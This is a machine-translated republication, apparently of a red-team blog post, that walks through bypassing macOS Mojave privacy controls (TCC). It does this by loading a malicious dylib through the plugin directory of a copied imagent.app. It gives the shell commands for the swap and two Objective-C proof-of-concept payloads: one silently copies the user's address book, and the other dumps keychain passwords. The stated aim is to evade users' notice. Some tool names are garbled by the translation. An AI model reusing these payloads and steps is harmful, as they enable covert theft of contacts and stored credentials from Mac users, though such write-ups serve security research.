Shulou(Shulou.com)05/31 Report--

This article will explain in detail how to bypass macOS privacy control, the quality of the article content is high, so Xiaobian share for everyone to make a reference, I hope you have a certain understanding of relevant knowledge after reading this article.

What's written on the front

As each new version of macOS introduces privacy or security updates, we need to use some useful techniques to browse and understand what changes Apple has made.

In late 2018, Apple introduced macOS Mojave and introduced a privacy restriction mechanism designed to alert users when apps request access to sensitive data such as cameras, microphones, address books and calendars. And often, one of the core things that Red Team researchers do is that penetration goes undetected, so we need to bypass these security controls to avoid users discovering our behavior, so the last thing we want is for the system to pop up the following warning dialog:

We'll show you a technique for circumventing macOS privacy controls and other protective access restrictions, such as Keychain.

macOS Privacy Control Overview

I've been trying to figure out how to get around Mojave's privacy controls, and I've been thinking about how the operating system displays privacy alerts to users when third-party apps access features like calendars and address books. More importantly, I wonder how Apple's signature app can access these features without asking for user consent.

All the answers I wanted to find were in the TTC. TTC stands for Transparency, Licensing and Control Services. In addition to the sandbox, TTC is responsible for monitoring program access requests and alerting users when restricted resources are requested.

We can look at the following behaviors:

ls ~/Library/Calendars

Unless you have previously agreed to let Terminal.app access the Calendar program (you can reset permissions by using the command "ttcutil reset Calendar"), the following warning box will pop up:

After clicking "Do not allow", you will see a message requesting an application error in the console:

Check the Security & Privacy tab in the Control Panel and you will see:

Interestingly, in this configuration panel, we do not see the figure of Calendar. app. When we use the codesign tool to check the permissions of Calendar.app, the information is as follows:

com.apple.private.tcc.allowkTCCServiceReminderskTCCServiceCalendarkTCCServiceAddressBook

Here, we can see the permission com.apple.private.tcc.allow, which, if applied, gives us unprompted access to protected resources. Therefore, every resource that needs to be accessed needs to be listed in this authorization list, and Calendar.app can directly access reminders, calendars, and address books, while TCC does not display any privacy warning boxes to users.

Unfortunately, we can't sign our app directly with this permission and add it to the com.apple.private permission list, because they only work with apple-signed binaries, so we need to find another way.

How?

Since macOS Mojave was released, there have been many posts on the web discussing this, most of which rely on using some way to control applications that are in the permission list, but we prefer to use other methods to execute code in the target application.

In this article, we'll focus on the imagent.app that comes with macOS, located at/System/Library/PrivateFrameworks/IMCore.framework/imagent. app. After looking at the permissions of the app, we find a very interesting thing. First, we see that it can access the address book without alerting the user:

com.apple.private.tcc.allow.overridablekTCCServiceAddressBook

In addition, we can see that this application is able to access multiple Keychain access groups:

keychain-access-groupsichatappleappleaccountInternetAccountsIMCore

Next, we need to use the codesign tool to verify the validation identifier associated with the code:

codesign -d --entitlements :- /System/Library/PrivateFrameworks/IMCore.framework/imagent.app -vv

After execution, we can see embedded metadata as follows:

CodeDirectory v=20100 size=4066 flags=0x0(none) hashes=120+5 location=embedded

The identifier to be aware of when finding a suitable proxy application is library-validation, which means that only a dylib or application group ID signed by Apple can be loaded. The runtime flag indicates that the application uses a hardened runtime environment, which does not allow us to load arbitrary dylib into the process.

If neither identity exists, we don't have to deal with these restrictions. Now you're probably thinking,"Can I load my dylib with the dyldinsert library? "... well... No! Apple certainly thought about this, and if you look at the source code at https://opensource.apple.com/source/dyld/dyld-655.1.1/src/dyld.cpp.auto.html, you

As you will see, any attempt to load dylib through environment variables is limited when authorization exists.

So what other options do we have? By analyzing the structure of imagent.app, we see a PlugIns directory designed to load extensions at runtime. Since our target application doesn't need signed dylib, it's possible to load arbitrary code into a signed process.

Next, we need to decompile the binaries and see how the PlugIns directory is used.

While looking for NSBundle references, we found the_loadServices method:

We can see the file extensions that the plug-in Bundle must contain, and the process of loading the Bundle with the function:

Next, we need to create a plug-in, here I directly found a ready-made imservice plug-in to modify directly, plug-in path is/System/Library/Messages/PlugIns.

After getting our plug-in, we can copy it to a writable path:

cp -r /System/Library/PrivateFrameworks/IMCore.framework /tmp/; cp -r /System/Library/Messages/PlugIns/iMessage.imservice /tmp/IMCore.framework/imagent.app/Contents/PlugIns/

Next we need to create the dylib to load. When creating dylib, we will use the attribute ((constructor)) descriptor to ensure that the provided code is executed when the library is loaded, so that the proxy application can exit without displaying a prompt box to the user. For example:

@implementation FunkyDylib :NSObject-(void)copyFilesFrom:(NSString *)src toPath:(NSString *)dst {NSFileManager *fileManager = [[NSFileManager alloc]init];[fileManager copyItemAtPath:src toPath:dst error:nil];}@endvoid runPOC(void) {[FunkyDylib alloc] copyFilesFrom:@"/Users/xpn/Library/Application Support/AddressBook" toPath:@"/tmp/AddressBook"];NSLog(@"[*] Copy complete, check /tmp/AddressBook for data");}__attribute__((constructor))static void customConstructor(int argc, const char **argv) {printf("IMCore PlugIns hijack POC by @_xpn_\n\n");runPOC();exit(0);}

After compilation, we can directly replace the existing plugin dylib of iMessage.imservice:

cp -f funky.dylib /tmp/IMCore.framework/imagent.app/Contents/PlugIns/iMessage.imservice/Contents/MacOS/iMessage

Next, launch imagent:

/tmp/IMCore.framework/imagent.app/Contents/MacOS/imagent

If everything is normal, no warning box will pop up at this time, and the address book data will be copied to/tmp:

Visit Keychain

In addition to the above effects, we can also use this technique in other places, such as Keychain access groups:

Next, we try to get the user's Keychain credentials, where we need to use the SecItemCopyMatching method to search for credentials and export all the attributes of the Keychain, including the user's stored password:

@implementation FunkyDylib :NSObject-(void)harvestKeychain {NSDictionary *query = @{(id)kSecClass: (id)kSecClassGenericPassword,(id)kSecReturnData: (id)kCFBooleanTrue,(id)kSecAttrSynchronizable: (id)kCFBooleanTrue,(id)kSecReturnAttributes: (id)kCFBooleanTrue,(id)kSecMatchLimit: (id)kSecMatchLimitAll};NSData *inData = nil;CFTypeRef inTypeRef = (__bridge CFTypeRef)inData;OSStatus status = SecItemCopyMatching((CFDictionaryRef)query, &inTypeRef);if(status != noErr){printf("[!] Error with SecItemCopyMatching\n");return;}NSLog(@"[*] Dumping Wifi Creds from Keychain...\ n\n");NSLog(@"%@", (__bridge id)inTypeRef);}@endvoid runPOC(void) {[[FunkyDylib alloc] harvestKeychain];}__attribute__((constructor))static void customConstructor(int argc, const char **argv) {printf("IMCore PlugIns hijack POC by @_xpn_\n\n");runPOC();exit(0);}

Copy the above and overwrite the iMessage plugin dylib created earlier, then launch imagent:

About how to bypass macOS privacy controls to share here, I hope the above content can be of some help to everyone, you can learn more knowledge. If you think the article is good, you can share it so that more people can see it.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.